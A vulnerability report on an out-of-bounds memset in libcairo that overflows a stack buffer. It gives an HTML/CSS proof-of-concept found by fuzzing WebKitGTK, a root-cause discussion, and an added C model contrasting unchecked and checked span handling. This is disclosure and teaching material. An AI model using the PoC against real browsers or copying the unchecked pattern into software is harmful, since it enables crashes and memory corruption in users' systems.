Out-of-bounds memset in libcairo results in stack buffer overflow
Hello, I found a bug that could result in a stack buffer overflow in libcairo. This bug was found in the process of fuzzing WebKitGTK. It was originally found in cairo-1.14.8, but it is also reproducible with the recent git commit 06ef6db9.
<style>
#da {
border-left: solid 1em;
border-top-left-radius: 27vmin;
border-bottom-style: double;
}
#ta {
font-family: 'Calibri';
}
:root {
-webkit-border-end: solid 1px;
column-width: 1px
}
</style>
<script>
function js() {
ta.cols = 38;
}
</script>
<body onload=js()>
<dialog id="da"><textarea id="ta"/></dialog>
</body>
cairo-rectangular-scan-converter.c:
The function generate() calls render_rows(), and the function actually invoked is _cairo_image_spans_and_zero(). With the provided PoC, it is called 5 times before the process crashes; the last call overflows the buffer and overwrites the stack canary. (With some untrimmed PoCs, the written content also overwrites the return address on the stack.)
_cairo_image_spans_and_zero() writes zeros to the stack, but the root cause of the crash could reside in the logic of generate(). Thus, besides DoS, an unspecified impact could also exist. This bug was found by ADLab of Venustech.
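The following is an added example to illustrate the bug class the report describes; it is not cairo's code and not part of the original report. It models a row callback that memsets a fixed-size stack span buffer using a span count it does not validate, with a sentinel word placed directly after the buffer standing in for the compiler's stack canary so the overwrite can be observed without crashing. The names (span_t, frame_t, MAX_SPANS, CANARY_VALUE, row_spans_and_zero_unchecked/checked, render_row_*), the span layout and the buffer size are all assumptions for illustration, not cairo's actual types or limits.

```c
/* Hypothetical model of the bug class in the report above; NOT cairo's code.
 * A scan converter keeps a fixed-size span array on the stack and hands it
 * to a row callback that memsets a length derived from unvalidated span
 * counts.  A sentinel word right after the array stands in for the stack
 * canary the report says gets overwritten. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_SPANS    8           /* assumed buffer capacity */
#define CANARY_VALUE 0xDEADBEEFu /* no zero byte, so any zeroing is visible */

typedef struct {
    int32_t x;        /* span start (assumed layout) */
    uint8_t coverage; /* alpha coverage (assumed layout) */
} span_t;

/* Stand-in for the callee's stack frame: span buffer, then the canary. */
typedef struct {
    span_t   spans[MAX_SPANS];
    uint32_t canary;
} frame_t;

static void frame_init(frame_t *f) {
    memset(f, 0xAA, sizeof *f);
    f->canary = CANARY_VALUE;
}

/* Unchecked row callback: trusts num_spans and zeroes that many entries.
 * The write is clamped to the frame_t object only so the model itself stays
 * well-defined; everything past spans[] still lands on the canary, which is
 * exactly the effect the report describes. */
static void row_spans_and_zero_unchecked(frame_t *f, size_t num_spans) {
    size_t len = num_spans * sizeof(span_t);
    if (len > sizeof *f)
        len = sizeof *f;                 /* model boundary, not a fix */
    memset((unsigned char *)f, 0, len);
}

/* Checked variant: refuse a span count that does not fit the buffer.
 * Returns 0 on success, -1 if the request was rejected. */
static int row_spans_and_zero_checked(frame_t *f, size_t num_spans) {
    if (num_spans > MAX_SPANS)
        return -1;
    memset(f->spans, 0, num_spans * sizeof(span_t));
    return 0;
}

/* 1 if the canary survived, 0 if the callback clobbered it. */
static int frame_canary_intact(const frame_t *f) {
    return f->canary == CANARY_VALUE;
}

/* Drives one row through the unchecked callback; returns canary status. */
static int render_row_unchecked(size_t num_spans) {
    frame_t f;
    frame_init(&f);
    row_spans_and_zero_unchecked(&f, num_spans);
    return frame_canary_intact(&f);
}

/* Same for the checked callback; *rejected reports whether it refused. */
static int render_row_checked(size_t num_spans, int *rejected) {
    frame_t f;
    frame_init(&f);
    *rejected = row_spans_and_zero_checked(&f, num_spans) != 0;
    return frame_canary_intact(&f);
}

int main(void) {
    int rejected;
    printf("unchecked, %d spans: canary %s\n", MAX_SPANS,
           render_row_unchecked(MAX_SPANS) ? "intact" : "overwritten");
    printf("unchecked, %d spans: canary %s\n", MAX_SPANS + 1,
           render_row_unchecked(MAX_SPANS + 1) ? "intact" : "overwritten");
    printf("checked,   %d spans: canary %s, rejected=%d\n", MAX_SPANS + 1,
           render_row_checked(MAX_SPANS + 1, &rejected) ? "intact" : "overwritten",
           rejected);
    return 0;
}
```

The point of the model is the contract between generate()-style callers and the row callback: whichever side computes the span count must bound it by the buffer capacity, and the callback should fail loudly (return an error) rather than trust the count, since a silent clamp would hide the upstream logic error the report suspects in generate().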